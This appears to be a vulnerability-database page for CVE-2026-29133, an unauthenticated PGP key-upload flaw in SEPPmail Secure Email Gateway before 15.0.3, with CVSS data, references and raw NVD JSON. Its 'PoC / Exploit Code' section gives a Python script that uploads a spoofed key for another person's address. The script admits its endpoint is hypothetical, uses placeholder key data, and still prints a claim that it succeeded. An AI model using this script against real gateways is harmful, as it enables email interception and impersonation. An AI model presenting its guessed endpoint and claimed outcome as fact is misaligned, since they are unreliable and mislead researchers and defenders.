CVE-2026-29133

Description

SEPPmail Secure Email Gateway before version 15.0.3 allows an attacker to upload PGP keys with UIDs that do not match their email address.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:* - VULNERABLE

SEPPmail Secure Email Gateway < 15.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target URL for key upload (hypothetical endpoint based on vulnerability description) target_url = "https://target-seppmail-gateway/api/key/upload" # Malicious PGP Public Key block with a spoofed UID ([email protected]) # The attacker holds the corresponding private key for this public key. pgp_key_data = """-----BEGIN PGP PUBLIC KEY BLOCK----- mQINBGI... (Base64 encoded key data) ... =abcde -----END PGP PUBLIC KEY BLOCK-----""" headers = { "User-Agent": "Mozilla/5.0 (Compatible; CVE-2026-29133 PoC)", "Content-Type": "application/x-www-form-urlencoded" } # Payload containing the email address to spoof and the malicious key payload = { "email": "[email protected]", "public_key": pgp_key_data } try: # Exploit: Send the upload request without authentication (PR:N) response = requests.post(target_url, data=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Malicious PGP key uploaded for [email protected]") print("[+] Attacker can now decrypt emails or forge signatures.") else: print(f"[-] Upload failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-29133
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-29133
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-29133/
[4] VulDB https://vuldb.com/cve/CVE-2026-29133
[5] https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#seppmail-vulnerability-disclosure-1503

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-29133", "sourceIdentifier": "[email protected]", "published": "2026-04-02T09:16:21.483", "lastModified": "2026-04-16T19:06:51.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SEPPmail Secure Email Gateway before version 15.0.3 allows an attacker to upload PGP keys with UIDs that do not match their email address."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0.3", "matchCriteriaId": "E3729650-81CA-4311-94BF-14A7A191F8D1"}]}]}], "references": [{"url": "https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#seppmail-vulnerability-disclosure-1503", "source": "[email protected]", "tags": ["Release Notes"]}]}}